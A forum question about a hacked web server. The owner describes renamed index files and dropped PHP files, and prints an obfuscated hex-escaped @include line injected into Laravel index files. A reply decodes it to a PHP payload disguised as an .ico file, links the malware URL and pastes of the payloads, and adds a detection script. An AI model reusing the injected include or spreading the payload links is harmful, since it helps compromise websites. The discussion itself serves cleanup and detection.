I've got an issue on my server. For example, I have a static HTML website. It worked well for a couple of days, then the links got broken. I checked FTP and saw that index.html had been changed to index.html.bak and there was an index.php.
These strange files contain some encrypted code, such as this: index.php https://hastebin.com/xepokigeqe.xml
And this: xml62.php https://hastebin.com/edohitogoc.xml
This also broke my other PHP web apps. Some of my Laravel apps' index files got injected with these lines:
@include "\x2fh\x6fm\x65/\x757\x335\x362\x336\x2f1\x37n\x61p\x6fl\x69p\x69z\x7aa\x2ec\x6fm\x2fa\x73s\x65t\x73/\x69m\x61g\x65s\x2fa\x76a\x74a\x72s\x2ff\x61v\x69c\x6fn\x5f0\x344\x624\x65.\x69c\x6f";
I don't know how to solve this or how to research it. If anyone knows about this, please help me. I'd be glad. Thanks.
Decrypts to @include "/home/u7356236/bebekti.com/script/revslider/favicon_45717f.ico";
The malware is: http://bebekti.com/script/revslider/favicon_45717f.ico
It is a PHP file disguised as an icon file, and it decrypts to: https://hastebin.com/racohopene.xml
I would change all of your passwords and make sure it is something secure.
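To find other files carrying the same kind of injected line, the sketch below resolves PHP's hex and octal string escapes and reports every include/require whose path is hidden behind them. It is an added example, not code from the question or the answer; the function names and the sample input are constructed for illustration.

```python
import re

# PHP double-quoted strings accept \xHH (1-2 hex digits) and \OOO (1-3 octal digits).
ESCAPE = re.compile(r'\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})')
# include/require (optionally @-silenced or _once) directly followed by a "..." literal.
INCLUDE = re.compile(r'@?\b(?:include|require)(?:_once)?\s*\(?\s*"((?:[^"\\]|\\.)*)"')
# Extensions that a legitimate PHP include target would not normally have.
NON_PHP_EXT = ('.ico', '.png', '.jpg', '.gif', '.css', '.txt')

def decode_php_escapes(literal):
    """Resolve hex and octal escapes the way PHP does inside double quotes."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2), 8) & 0xFF)  # PHP wraps octal values above 0o377
    return ESCAPE.sub(repl, literal)

def find_obfuscated_includes(source):
    """Return (line_no, decoded_path, disguised) for includes hidden behind escapes."""
    hits = []
    for line_no, line in enumerate(source.splitlines(), 1):
        for m in INCLUDE.finditer(line):
            raw = m.group(1)
            if ESCAPE.search(raw):  # plain-text include paths are not reported
                path = decode_php_escapes(raw)
                hits.append((line_no, path, path.lower().endswith(NON_PHP_EXT)))
    return hits

# Constructed sample, not taken from the infected server.
SAMPLE = r'''<?php
@include "\x2fh\x6fm\x65/\x65x\x61m\x70l\x65/favicon_ab12cd.ico";
require __DIR__ . "/../vendor/autoload.php";
'''

if __name__ == "__main__":
    for line_no, path, disguised in find_obfuscated_includes(SAMPLE):
        note = " (non-PHP extension)" if disguised else ""
        print(f"line {line_no}: includes {path}{note}")
```

Run over each .php file in the account, this lists the decoded targets so the disguised payload files can be located and removed along with the injected lines.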